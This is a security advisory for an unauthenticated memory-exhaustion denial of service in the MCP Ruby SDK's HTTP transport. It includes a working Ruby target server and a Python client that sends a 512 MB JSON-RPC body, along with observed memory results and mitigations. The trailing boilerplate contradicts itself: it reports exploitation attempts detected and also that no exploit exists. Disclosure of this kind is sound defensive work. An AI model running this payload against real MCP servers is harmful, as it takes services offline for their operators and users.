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GHSA-h669-8m4g-r2hc
No affected components available
Summary
An unauthenticated remote attacker can force any MCP Ruby SDK server using MCP::Server::Transports::StreamableHTTPTransport to allocate gigabytes of memory by sending a single oversized JSON-RPC POST. The transport reads the entire HTTP body into a Ruby String and parses it with JSON.parse(body, symbolize_names: true) with no size limit, no Content-Length pre-check, and no streaming parser, allowing trivial denial of service against the worker process.
Affected component
lib/mcp/server/transports/streamable_http_transport.rb, method handle_post:
- Line 341:
body_string = request.body.read— reads the full HTTP body into memory with no upper bound. - Lines 531–535:
JSON.parse(body_string, symbolize_names: true)— fully materialises the parsed object graph; withsymbolize_names: trueevery JSON key also allocates a Ruby symbol.
The vulnerable path runs before session validation, so it is reachable in both the default stateful mode and in stateless: true mode, without an Mcp-Session-Id header and without any prior authentication.
A second instance of the same root cause exists in lib/mcp/server/transports/stdio_transport.rb:23 ($stdin.gets with no limit: argument). The practical impact there is limited because the stdio peer is normally a trusted parent process, but the fix should cover both transports.
Proof of concept
Both files below are self-contained. Save them anywhere on disk, run the server in one terminal and the client in another. The only dependencies are the SDK's existing Gemfile entries (rack ~> 3.2, rackup >= 2.1.0, webrick ~> 1.9) and Python's standard library.
Server (oom_poc_server.rb)
require "bundler/setup"
require "mcp"
require "mcp/server/transports/streamable_http_transport"
require "rackup"
require "webrick"
require "rackup/handler/webrick"
server = MCP::Server.new(name: "oom-poc-target", tools: [])
transport = MCP::Server::Transports::StreamableHTTPTransport.new(
server, stateless: true, enable_json_response: true,
)
Thread.new do
loop do
rss_mb = `ps -o rss= -p #{Process.pid}`.to_i / 1024
STDERR.puts("[mem] PID=#{Process.pid} RSS=#{rss_mb} MB")
sleep 2
end
end
STDERR.puts("[poc] listening on http://127.0.0.1:9293/")
Rackup::Handler::WEBrick.run(
transport,
Host: "127.0.0.1", Port: 9293,
AccessLog: [], Logger: WEBrick::Log.new(File::NULL),
)
Client (oom_poc_client.py)
import socket
HOST, PORT, PAYLOAD_MB = "127.0.0.1", 9293, 512
inner = b"A" * (PAYLOAD_MB * 1024 * 1024 - 64)
body = b'{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"x":"' + inner + b'"}}'
headers = (
f"POST / HTTP/1.1\r\nHost: {HOST}:{PORT}\r\n"
f"Content-Type: application/json\r\n"
f"Accept: application/json, text/event-stream\r\n"
f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n"
).encode()
s = socket.create_connection((HOST, PORT), timeout=120)
s.sendall(headers)
for i in range(0, len(body), 1 << 20):
s.sendall(body[i:i + (1 << 20)])
print(f"sent {PAYLOAD_MB} MB")
try:
print("recv:", s.recv(2048)[:200])
except OSError as e:
print("server unresponsive:", e)
Reproduction commands
bundle install
ruby oom_poc_server.rb # terminal A
python3 oom_poc_client.py # terminal B
Observed result
Tested on macOS, Ruby 3.2.4 (rbenv), against the SDK's main branch with rack 3.2.6 / rackup 2.3.1 / webrick 1.9.2:
[mem] PID=61394 RSS=44 MB # idle baseline
[mem] PID=61394 RSS=44 MB
[mem] PID=61394 RSS=44 MB
[mem] PID=61394 RSS=1663 MB # immediately after one 512 MB POST
[mem] PID=61394 RSS=1663 MB # memory not released
[mem] PID=61394 RSS=1663 MB
A single unauthenticated POST grew the worker's RSS from 44 MB to 1.66 GB (~37× amplification). On any deployment with a per-worker memory cap at or below ~2 GB, the same request OOM-kills the worker.
<img width="1588" height="836" alt="poc1-1" src="https://github.com/user-attachments/assets/13522d05-b7fa-4c05-ba65-ce8ff7d66d4f" /> <img width="1400" height="948" alt="poc1-2" src="https://github.com/user-attachments/assets/b230bf85-bed9-46ca-91cf-53ffd10306a6" />Impact
- Attacker requirements: none beyond TCP reach of the MCP endpoint. No session, no credentials, no prior interaction.
- Effect: memory-exhaustion denial of service. A single request can take a worker offline; sustained low-rate requests keep the service down across worker restarts. On multi-tenant deployments a single attacker tenant can starve neighbours.
- Affected deployments: every server mounting
MCP::Server::Transports::StreamableHTTPTransportas a Rack app — the canonical HTTP deployment pattern. Both stateful andstateless: trueconfigurations are affected.
Suggested mitigation
- Reject requests whose
Content-Length(or actual read length) exceeds a configurable threshold (e.g. 4 MiB by default) before callingrequest.body.read. - Use a streaming JSON parser, or pass
max_nesting:plus a hard byte cap toJSON.parse. - Apply the same
limit:argument to$stdin.getsinStdioTransportfor defence in depth.
The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability. The impact is confined to the system where the vulnerability exists. There is a high impact on the availability of the system.
Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
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